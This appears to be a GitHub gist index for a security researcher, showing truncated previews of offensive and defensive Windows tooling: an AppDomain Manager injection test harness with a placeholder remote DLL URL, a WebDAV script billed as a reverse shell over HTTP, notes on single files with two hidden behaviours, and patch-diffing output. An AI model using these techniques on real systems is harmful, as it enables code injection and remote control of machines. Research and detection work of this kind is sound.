@secdev02
secdev02 / AppDomain_test.ps1
Last active January 30, 2026 18:34
Quick and simple test harness
# AppDomain Manager Injection Detection Tests
# This script tests three methods of AppDomain Manager injection
param(
    [string]$TestExecutable = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    [string]$RemoteServer = "http://yourserver.com/tasks.dll",
    [string]$Base64RemoteDll = ""
)
$ErrorActionPreference = "Stop"
secdev02 / README.md
Created January 27, 2026 23:59
Task Manager

Get-ScheduledTask | Where-Object {$_.Actions.Execute -like 'cmd.exe'} | Select-Object TaskName, TaskPath, State

Get-ScheduledTask | ForEach-Object {
    $task = $_
    $_.Actions | Where-Object {$_.Execute -like '*cmd.exe*'} | ForEach-Object {
        [PSCustomObject]@{
            TaskName = $task.TaskName
            TaskPath = $task.TaskPath
            State = $task.State
secdev02 / gist:40e463f2728ebf5058a83c454ab5b06d
Created January 22, 2026 04:49
Equation Group windbreaker dump file
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\dumps\regret.dmp]
User Mini Dump File: Only registers, stack and portions of memory are available
Symbol search path is: SRV*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows XP Version 2600 (Service Pack 2) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
secdev02 / README.md
Created January 4, 2026 02:38
OGhidra - Analysis

============================================================ [09:00:11] 🚀 SMART TOOL: RENAME ALL FUNCTIONS

Starting OPTIMIZED bulk function analysis with mode: smart_enumeration

============================================================ [09:00:11] ⚡ PERFORMANCE ENHANCEMENTS

• Batch processing (size: 50)

secdev02 / webdav_minimalist.ps1
Created December 21, 2025 18:07
Minimalist - PowerShell WebDAV - Decoy Share
<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>
<#
.SYNOPSIS
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept
secdev02 / bginteger.py
Created December 17, 2025 20:02
Factorial Mod N - GCD
import math
import time
def gcd_factorial_efficient(n):
    """Compute GCD(sqrt(n)!, n) efficiently"""
    sqrt_n = int(math.sqrt(n))
    g = n
    print(f"Computing GCD({sqrt_n}!, {n})")
    print(f"Processing {sqrt_n} numbers...\n")
secdev02 / README.md
Created December 17, 2025 18:35
Capability Diffusion - Part Two

A single file that has 2 different ways of behaving

In this case we simply load and compile 2 different C# calls.

Use your imagination.

secdev02 / HelloWorld.cs
Created December 17, 2025 18:06
Capability Diffusion - Sound of Silence - Basic Example.
using System;
using System.Configuration;
using System.IO;
using System.Net;
namespace HelloWorldLib
{
    public class HelloWorld
    {
        private static Configuration _config;
secdev02 / bindiff.ps1
Last active December 16, 2025 23:37
Extractor
<#
.SYNOPSIS
Extracts a specific file from nested CAB files within an MSU package.
.DESCRIPTION
Extracts MSU to get CAB files, then extracts a specific file by name,
and performs additional expansion rounds if the file is itself a CAB.
.PARAMETER MsuPath
Path to the MSU file.
secdev02 / gist:d2aaac0f1dda92d52a89c276cab056f2
Created December 16, 2025 19:50
PatchDiff-AI - Example
{'file': 'kerberos.dll', 'patch_store_uid': 'c7eae9d4-8362-478d-b184-e4abea470c2b', 'kb': 'KB5068861', 'confidence': 0.15, 'date': 1763412539.2780097, 'cve': 'CVE-2025-60704', 'change_count': 22}
--------------------------------------------------------------------
CVE-2025-60704 Report
--------------------------------------------------------------------
Component
--------------------------------------------------------------------